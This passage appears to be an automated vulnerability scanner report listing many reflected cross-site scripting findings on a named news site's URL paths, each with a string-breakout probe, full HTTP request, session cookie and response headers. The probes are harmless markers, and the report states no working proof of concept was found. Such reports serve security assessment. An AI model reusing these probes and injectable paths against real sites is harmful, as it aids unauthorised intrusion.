This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7cf31'%3bc915d077dc3 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa69'%3be60d6f1c0da was submitted in the REST URL parameter 1. This input was echoed as 4aa69';e60d6f1c0da in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4aa69'%3be60d6f1c0da HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4855a'%3bc818f85888d was submitted in the REST URL parameter 1. This input was echoed as 4855a';c818f85888d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets4855a'%3bc818f85888d/css/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:24 GMT
Date: Sun, 19 Dec 2010 03:03:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43354
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40c4'%3bad7596597dc was submitted in the REST URL parameter 2. This input was echoed as c40c4';ad7596597dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/cssc40c4'%3bad7596597dc/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:29 GMT
Date: Sun, 19 Dec 2010 03:03:29 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43318
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b313'%3b698c4e0738c was submitted in the REST URL parameter 3. This input was echoed as 1b313';698c4e0738c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc1b313'%3b698c4e0738c/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:34 GMT
Date: Sun, 19 Dec 2010 03:03:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43281
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3be0'%3b80f99c8f660 was submitted in the REST URL parameter 4. This input was echoed as e3be0';80f99c8f660 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc/e3be0'%3b80f99c8f660 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:40 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124dc'%3b0b5b2a36149 was submitted in the REST URL parameter 1. This input was echoed as 124dc';0b5b2a36149 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets124dc'%3b0b5b2a36149/css/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43333
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9facd'%3bc69670aae3e was submitted in the REST URL parameter 2. This input was echoed as 9facd';c69670aae3e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css9facd'%3bc69670aae3e/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:28 GMT
Date: Sun, 19 Dec 2010 03:03:28 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43298
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f6a'%3b858dfffb16a was submitted in the REST URL parameter 3. This input was echoed as a9f6a';858dfffb16a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idca9f6a'%3b858dfffb16a/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:33 GMT
Date: Sun, 19 Dec 2010 03:03:33 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43261
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f81'%3b65df32cf4f8 was submitted in the REST URL parameter 4. This input was echoed as 88f81';65df32cf4f8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc/88f81'%3b65df32cf4f8 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b85'%3bc4767f71b50 was submitted in the REST URL parameter 1. This input was echoed as 40b85';c4767f71b50 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets40b85'%3bc4767f71b50/include/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:27 GMT
Date: Sun, 19 Dec 2010 03:03:27 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43677
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d1'%3b3317ae53630 was submitted in the REST URL parameter 2. This input was echoed as 8b9d1';3317ae53630 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include8b9d1'%3b3317ae53630/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:32 GMT
Date: Sun, 19 Dec 2010 03:03:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43640
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1cea'%3b38c5aa0a5e8 was submitted in the REST URL parameter 3. This input was echoed as f1cea';38c5aa0a5e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdpartyf1cea'%3b38c5aa0a5e8/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:37 GMT
Date: Sun, 19 Dec 2010 03:03:37 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43604
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6456b'%3b4a9a61322fb was submitted in the REST URL parameter 4. This input was echoed as 6456b';4a9a61322fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdparty/idc6456b'%3b4a9a61322fb/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:42 GMT
Date: Sun, 19 Dec 2010 03:03:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43587
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9094'%3b9fe591fa809 was submitted in the REST URL parameter 5. This input was echoed as e9094';9fe591fa809 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdparty/idc/e9094'%3b9fe591fa809 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43595
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c67f5'%3b33a72d2d10d was submitted in the REST URL parameter 1. This input was echoed as c67f5';33a72d2d10d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajaxc67f5'%3b33a72d2d10d/email/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:13 GMT
Date: Sun, 19 Dec 2010 02:58:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43245
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9df8'%3b9082a8b2204 was submitted in the REST URL parameter 2. This input was echoed as e9df8';9082a8b2204 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/emaile9df8'%3b9082a8b2204/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e698'%3b8b8919e8594 was submitted in the REST URL parameter 3. This input was echoed as 6e698';8b8919e8594 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
